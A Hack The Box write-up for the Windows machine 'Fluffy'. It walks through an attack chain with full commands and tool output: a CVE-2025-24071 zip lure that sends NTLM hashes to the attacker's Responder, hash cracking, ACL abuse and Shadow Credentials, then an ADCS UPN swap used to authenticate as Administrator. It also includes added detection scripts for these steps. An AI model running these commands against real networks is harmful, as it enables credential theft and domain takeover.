Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Fluffy (Windows)
Initial domain foothold from provided credentials, credential capture via CVE-2025-24071 lure, Shadow Credentials on service accounts, and final ADCS abuse to authenticate as Administrator.
Target
- IP: 10.129.205.253
Machine information
As is common in real-life Windows pentests, you start the Fluffy box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!
Recon
sudo nmap -sC -sV 10.129.205.253 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-25 20:32:29Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
|_SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-05-25T20:33:59+00:00; +22h26m28s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
|_SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-05-25T20:34:00+00:00; +22h26m28s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
|_SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-05-25T20:33:59+00:00; +22h26m28s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
|_SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-05-25T20:34:00+00:00; +22h26m28s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add fluffy.htb and dc01.fluffy.htb to /etc/hosts.
nxc smb 10.129.205.253 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB 10.129.205.253 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.205.253 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.205.253 445 DC01 [*] Enumerated shares
SMB 10.129.205.253 445 DC01 Share Permissions Remark
SMB 10.129.205.253 445 DC01 ----- ----------- ------
SMB 10.129.205.253 445 DC01 ADMIN$ Remote Admin
SMB 10.129.205.253 445 DC01 C$ Default share
SMB 10.129.205.253 445 DC01 IPC$ READ Remote IPC
SMB 10.129.205.253 445 DC01 IT READ,WRITE
SMB 10.129.205.253 445 DC01 NETLOGON READ Logon server share
SMB 10.129.205.253 445 DC01 SYSVOL READ Logon server share
We notice the IT share, which is both readable and writable.
smbclient -U j.fleischman '\\10.129.205.253\IT'
ls
. D 0 Sun May 25 22:30:11 2025
.. D 0 Sun May 25 22:30:11 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 17:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 17:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 17:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 17:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 16:31:07 2025
get Upgrade_Notice.pdf
The PDF says that vulnerabilities were discovered and that systems need updates.
It ends with:
"Please reach out to the Infrastructure Department at infrastructure@fluffy.htb"
Optionally, we can mount the share on the attacker machine:
mkdir mount
sudo mount -t cifs //10.129.205.253/IT ./mount -o username='j.fleischman',password='J0elTHEM4n1990!'
bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -ns 10.129.205.253 -d 'fluffy.htb' -dc 'dc01.fluffy.htb' -c All --zip
nxc smb dc01.fluffy.htb -d fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users.txt
In BloodHound, click Cypher --> click the folder icon --> Active Directory --> All Kerberoastable users.
The result is three accounts: ldap_svc, ca_svc, and winrm_svc.
Download targetedKerberoast:
- https://github.com/ShutdownRepo/targetedKerberoast
sudo ntpdate dc01.fluffy.htb
python3 targetedKerberoast/targetedKerberoast.py -v -d 'fluffy.htb' -u 'j.fleischman' -p 'J0elTHEM4n1990!'
We obtain the TGS hashes for the three users.
Save them in a file named hash.
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt
None of them crack.
Upgrade_Notice.pdf lists these CVEs:
CVE-2025-24996
CVE-2025-24071
CVE-2025-46785
CVE-2025-29968
CVE-2025-21193
CVE-2025-3445
For CVE-2025-24071 there is a public proof of concept:
- https://github.com/0x6rss/CVE-2025-24071_PoC
git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
python3 poc.py
Enter your file name: documents
Enter IP (EX: 192.168.1.162): 10.10.14.252
completed
This produces the file exploit.zip.
sudo responder -I tun0
Copy exploit.zip into the IT share and wait.
Responder captures the hash of p.agila.
Save it in hash.
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt
It cracks to the password prometheusx-303.
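The lure above only works because a file type inside the archive makes Windows Explorer contact a remote host when the archive is opened or extracted, and Responder is waiting there. A share-monitoring check a defender can run on anything newly written to a writable share such as IT is shown below. This is an added example, not part of the write-up or of the PoC repository: CVE-2025-24071 is publicly documented as abusing a .library-ms file inside an archive, and .lnk, .url and .scf files have long had comparable behaviour, so the extension watchlist is an assumed policy, not something taken from the page. The archive is constructed in memory with placeholder contents so the scan runs offline.

```python
"""Quarantine archives dropped on a share that carry file types which make
Windows Explorer authenticate to a remote path when opened or extracted.

Added example. RISKY_EXTENSIONS is an assumed policy; the sample archive is
constructed with placeholder contents and contains no real library file.
"""
import io
import zipfile

# Assumed watchlist of extensions that trigger implicit network access in Explorer.
RISKY_EXTENSIONS = (".library-ms", ".lnk", ".url", ".scf")


def risky_members(zip_bytes):
    """Return the names of archive members whose extension is on the watchlist."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Match on the full suffix so 'x.library-ms' is caught rather than only '.ms'.
            if info.filename.lower().endswith(RISKY_EXTENSIONS):
                found.append(info.filename)
    return found


def scan_share_upload(filename, data):
    """Decision for a file newly written to a share.

    Non-archives are allowed through unchanged; an archive is quarantined when
    any member has a risky extension.
    """
    if not filename.lower().endswith(".zip"):
        return {"file": filename, "action": "allow", "members": []}
    members = risky_members(data)
    action = "quarantine" if members else "allow"
    return {"file": filename, "action": action, "members": members}


def build_sample_archive():
    """Constructed sample: one harmless text file plus one .library-ms placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("documents/readme.txt", "quarterly notes")
        zf.writestr("documents/notice.library-ms",
                    "<!-- constructed placeholder, not a real library definition -->")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_archive()
    print(scan_share_upload("exploit.zip", sample))
    print(scan_share_upload("Upgrade_Notice.pdf", b"%PDF-1.4 placeholder"))
```

On the victim side the capture corresponds to an outbound SMB connection from the host that opened the archive; blocking outbound TCP 445 at the network edge and alerting on SMB sessions to hosts that are not known file servers catches the same activity independently of the file type.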
In BloodHound we see that p.agila is a member of the group 'service account managers', which has GenericAll over the group 'service accounts'.
The users ca_svc, ldap_svc, and winrm_svc are members of 'service accounts'.
We also see that 'service accounts' has GenericWrite over those three users.
Download bloodyAD:
- https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host 'dc01.fluffy.htb' -d fluffy.htb --dc-ip dc01.fluffy.htb -u 'p.agila' -p 'prometheusx-303' set owner 'service accounts' 'p.agila'
[+] Old owner S-1-5-21-497550768-2797716248-2627064577-512 is now replaced by p.agila on service accounts
python3 bloodyAD/bloodyAD.py --host 'dc01.fluffy.htb' -d fluffy.htb --dc-ip dc01.fluffy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember 'service accounts' 'p.agila'
[+] p.agila added to service accounts
python3 bloodyAD/bloodyAD.py --host 'dc01.fluffy.htb' -d fluffy.htb --dc-ip dc01.fluffy.htb -u 'p.agila' -p 'prometheusx-303' add genericAll 'service accounts' 'p.agila'
[+] p.agila has now GenericAll on service accounts
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
git checkout c4ecf411a585ca4647843c8c3856e023e738a528
cd ..
python3 pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "winrm_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6b01eb5f-13c2-8d6e-5438-4e7cc8a2c9fd
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: pyoRq0ue.pfx
[*] Must be used with password: 2wfPMOr5T2bWNVeLsBk3
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
A file pyoRq0ue.pfx is created.
certipy cert -export -pfx pyoRq0ue.pfx -password 2wfPMOr5T2bWNVeLsBk3 -out "pyoRq0ue_unprotected.pfx"
[*] Writing PFX to 'pyoRq0ue_unprotected.pfx'
certipy auth -pfx pyoRq0ue_unprotected.pfx -dc-ip 10.129.205.253 -username winrm_svc -domain 'fluffy.htb'
[*] Got hash for 'winrm_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767
evil-winrm -i dc01.fluffy.htb -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'
We get a PowerShell shell as winrm_svc.
We can retrieve the user flag.
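Every step from the bloodyAD commands (owner change, group add, GenericAll grant) through the pywhisker write to msDS-KeyCredentialLink is a write to the directory, and each one surfaces as Windows Security event 5136 (A directory service object was modified) when the domain audits directory service changes and the objects carry a SACL for those attributes. The detection logic below is an added example, not part of the write-up or of either tool; it models 5136 as a dict with the event's own field names and applies three rules: a security-descriptor rewrite on a watched group, a member added to a watched group, and a key credential written onto a user object by anything other than a computer account or an allowlisted identity. The watchlist, allowlist and sample events are constructed for this example.

```python
"""Flag the 5136 events produced by ACL abuse on a group and by Shadow Credentials.

Added example. WATCHED_GROUPS and KEYCRED_WRITERS_ALLOWED are assumed policy;
SAMPLE_5136 is constructed to mirror the write-up's sequence.
"""

# 5136 OperationType value for "Value Added" (the new attribute value being written)
VALUE_ADDED = "%%14674"

# Assumed watchlist: groups whose ACL or membership changes always alert.
WATCHED_GROUPS = {"service accounts", "service account managers"}

# Assumed allowlist: identities permitted to register key credentials on user
# objects (a Windows Hello for Business registration identity in a real estate).
KEYCRED_WRITERS_ALLOWED = set()


def leaf_cn(dn):
    """Return the lowercased value of the first RDN of a distinguished name."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1].strip().lower() if "=" in first else first.strip().lower()


def analyze_5136(events):
    """Return (rule, target, actor, time) tuples for suspicious 5136 events."""
    alerts = []
    for ev in events:
        if ev["OperationType"] != VALUE_ADDED:
            continue  # every rule here keys on the new value being written
        attr = ev["AttributeLDAPDisplayName"]
        actor = ev["SubjectUserName"]
        target = leaf_cn(ev["ObjectDN"])
        when = ev["TimeCreated"]

        if ev["ObjectClass"] == "group" and target in WATCHED_GROUPS:
            if attr == "nTSecurityDescriptor":
                # 'set owner' and 'add genericAll' both rewrite the security descriptor
                alerts.append(("acl_or_owner_change", target, actor, when))
            elif attr == "member":
                alerts.append(("member_added", target, actor, when))

        if attr == "msDS-KeyCredentialLink" and ev["ObjectClass"] == "user":
            # Computer accounts register their own keys; any other principal
            # writing a key credential onto a user object is the Shadow Credentials pattern.
            if not actor.endswith("$") and actor.lower() not in KEYCRED_WRITERS_ALLOWED:
                alerts.append(("shadow_credential_write", target, actor, when))
    return alerts


# Constructed sample events, in the order the chain above would generate them.
SAMPLE_5136 = [
    {"TimeCreated": "2025-05-25T20:40:01", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb", "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": VALUE_ADDED},
    {"TimeCreated": "2025-05-25T20:40:05", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb", "ObjectClass": "group",
     "AttributeLDAPDisplayName": "member", "OperationType": VALUE_ADDED},
    {"TimeCreated": "2025-05-25T20:41:10", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=winrm service,CN=Users,DC=fluffy,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    # benign: a computer account registering its own key material
    {"TimeCreated": "2025-05-25T20:42:00", "SubjectUserName": "DC01$",
     "ObjectDN": "CN=DC01,OU=Domain Controllers,DC=fluffy,DC=htb", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    # benign: an unrelated attribute change on a constructed user object
    {"TimeCreated": "2025-05-25T20:43:00", "SubjectUserName": "j.fleischman",
     "ObjectDN": "CN=J Fleischman,CN=Users,DC=fluffy,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
]

if __name__ == "__main__":
    for alert in analyze_5136(SAMPLE_5136):
        print(alert)
```

Where the SACL does not cover these attributes, event 4662 (An operation was performed on an object) with a write to the msDS-KeyCredentialLink property is the fallback signal for the Shadow Credentials step, and 4728/4732 (member added to a security-enabled group) covers the group add.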
Now repeat the same procedure for ca_svc, starting with the previous bloodyAD commands.
python3 pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "ca_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 7c220f45-51c4-87bc-a578-b272d1708860
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: siYhTVMS.pfx
[*] Must be used with password: GzsbKHyia5Ty6M1ObQDj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
A file siYhTVMS.pfx is created.
certipy cert -export -pfx siYhTVMS.pfx -password GzsbKHyia5Ty6M1ObQDj -out "siYhTVMS_unprotected.pfx"
[*] Writing PFX to 'siYhTVMS_unprotected.pfx'
certipy auth -pfx siYhTVMS_unprotected.pfx -dc-ip 10.129.205.253 -username ca_svc -domain 'fluffy.htb'
[*] Got hash for 'ca_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8
ca_svc is a member of the group Cert Publishers.
Do the same steps for ldap_svc; at the end we get:
[*] Got hash for 'ldap_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:22151d74ba3de931a352cba1f9393a37
certipy find -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -target dc01.fluffy.htb -text -stdout -vulnerable
Certificate Authorities
  0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : FLUFFY.HTB\Administrators
      Access Rights
        ManageCertificates              : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        ManageCa                        : FLUFFY.HTB\Domain Admins
                                          FLUFFY.HTB\Enterprise Admins
                                          FLUFFY.HTB\Administrators
        Enroll                          : FLUFFY.HTB\Cert Publishers
Certificate Templates                   : [!] Could not find any certificate templates
There are no vulnerable templates, but ca_svc still gives us a path: 'service accounts' has GenericWrite over its own members, so ca_svc can rewrite its own userPrincipalName, and because the User template takes the subject's UPN from the account, a certificate requested while ca_svc carries Administrator's UPN authenticates as Administrator. First set the UPN:
certipy account update -username ca_svc@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -user ca_svc -upn Administrator
[*] Updating user 'ca_svc':
userPrincipalName : Administrator
[*] Successfully updated 'ca_svc'
certipy req -username ca_svc@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -ca 'fluffy-DC01-CA' -target dc01.fluffy.htb -template User -upn administrator@fluffy.htb
[*] Saved certificate and private key to 'administrator.pfx'
certipy account update -username ca_svc@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -user ca_svc -upn ca_svc
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc
[*] Successfully updated 'ca_svc'
certipy auth -pfx administrator.pfx -dc-ip 10.129.205.253 -username Administrator -domain 'fluffy.htb'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
evil-winrm -i dc01.fluffy.htb -u 'Administrator' -H '8da83a3fa618b6e3a00e93f676c92a6e'
We get a PowerShell shell as Administrator.
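The final step leaves a distinctive trail: the userPrincipalName of ca_svc is set to another account's identity, a certificate is issued to ca_svc from the User template, and the UPN is restored within a minute. On the domain controller the UPN changes appear as event 4738 (A user account was changed; its User Principal Name field carries the new value, or '-' when that field was not touched), and on the CA the issuance appears as event 4887 (Certificate Services approved a certificate request and issued a certificate; its Requester and Attributes fields name the enrolling account and the template). The correlation below is an added example, not part of the write-up or of certipy; the events and the account inventory are constructed, and the 30-minute window is an assumed tuning value.

```python
"""Correlate a UPN swap on one account with a certificate issued to it.

Added example. ACCOUNTS stands in for an inventory a SIEM would pull from LDAP;
SAMPLE_EVENTS are constructed to mirror the write-up's final step.
"""
from datetime import datetime, timedelta

# Constructed account inventory: sAMAccountName -> expected UPN.
ACCOUNTS = {
    "administrator": "administrator@fluffy.htb",
    "ca_svc": "ca_svc@fluffy.htb",
    "ldap_svc": "ldap_svc@fluffy.htb",
    "winrm_svc": "winrm_svc@fluffy.htb",
    "p.agila": "p.agila@fluffy.htb",
}


def upn_user_part(upn):
    """'Administrator' and 'administrator@fluffy.htb' both map to 'administrator'."""
    return upn.split("@", 1)[0].lower()


def upn_collides(account, new_upn):
    """True when the new UPN names a different existing account."""
    user = upn_user_part(new_upn)
    return user != account and user in ACCOUNTS


def detect_upn_swap(events, window=timedelta(minutes=30)):
    """Return alert tuples for UPN collisions, certificates issued while a
    collision is open, and the UPN being restored afterwards."""
    alerts = []
    pending = {}  # account -> state of an open UPN collision
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        t = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4738:
            acct = ev["TargetUserName"].lower()
            new_upn = ev["UserPrincipalName"]
            if new_upn == "-":
                continue  # some other attribute changed; UPN untouched
            if upn_collides(acct, new_upn):
                pending[acct] = {"start": t, "impersonated": upn_user_part(new_upn),
                                 "cert_issued": False}
                alerts.append(("upn_collision", acct, new_upn, ev["TimeCreated"]))
            elif acct in pending and upn_user_part(new_upn) == acct:
                state = pending.pop(acct)
                kind = "upn_swap_with_enrollment" if state["cert_issued"] else "upn_swap_reverted"
                alerts.append((kind, acct, state["impersonated"], ev["TimeCreated"]))
        elif ev["EventID"] == 4887:
            # Requester is DOMAIN\account; strip the domain prefix.
            requester = ev["Requester"].split("\\", 1)[-1].lower()
            state = pending.get(requester)
            if state and t - state["start"] <= window:
                state["cert_issued"] = True
                alerts.append(("cert_issued_during_swap", requester,
                               ev["Attributes"], ev["TimeCreated"]))
    return alerts


# Constructed sample events mirroring the three certipy commands above.
SAMPLE_EVENTS = [
    {"EventID": 4738, "TimeCreated": "2025-05-25T21:10:00", "SubjectUserName": "ca_svc",
     "TargetUserName": "ca_svc", "UserPrincipalName": "Administrator"},
    {"EventID": 4887, "TimeCreated": "2025-05-25T21:10:20", "Requester": "FLUFFY\\ca_svc",
     "Attributes": "CertificateTemplate:User"},
    {"EventID": 4738, "TimeCreated": "2025-05-25T21:10:45", "SubjectUserName": "ca_svc",
     "TargetUserName": "ca_svc", "UserPrincipalName": "ca_svc"},
    # benign: a change on another account that did not touch the UPN
    {"EventID": 4738, "TimeCreated": "2025-05-25T21:12:00", "SubjectUserName": "p.agila",
     "TargetUserName": "p.agila", "UserPrincipalName": "-"},
]

if __name__ == "__main__":
    for alert in detect_upn_swap(SAMPLE_EVENTS):
        print(alert)
```

A UPN set to another account's name is worth an alert on its own, since the directory refuses a duplicate UPN only when the realm suffix is included; the enrollment correlation turns it into a high-confidence finding, and the certificate from the matching 4887 request can be revoked at the CA.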